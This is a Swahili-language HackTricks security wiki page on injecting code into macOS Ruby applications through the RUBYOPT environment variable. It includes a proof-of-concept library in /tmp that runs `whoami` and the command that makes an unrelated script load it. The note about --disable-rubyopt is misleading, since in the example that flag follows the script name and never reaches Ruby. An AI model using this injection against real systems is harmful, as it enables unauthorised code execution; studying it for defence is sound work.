hacktricks/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md

macOS Ruby Applications Injection

{{#include ../../../banners/hacktricks-training.md}}

RUBYOPT

Kwa kutumia hii env variable inawezekana kuongeza params mpya kwa ruby kila wakati inatekelezwa. Ingawa param -e haiwezi kutumika kubaini msimbo wa ruby wa kutekeleza, inawezekana kutumia params -I na -r kuongeza folda mpya kwenye maktaba za kupakia na kisha kubaini maktaba ya kupakia.

Unda maktaba inject.rb katika /tmp:

puts `whoami`

Tengeneza popote script ya ruby kama:

puts 'Hello, World!'

Kisha fanya script ya ruby isiyo na mpangilio iipakue na:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Fahamu ya kufurahisha, inafanya kazi hata na param --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

{{#include ../../../banners/hacktricks-training.md}}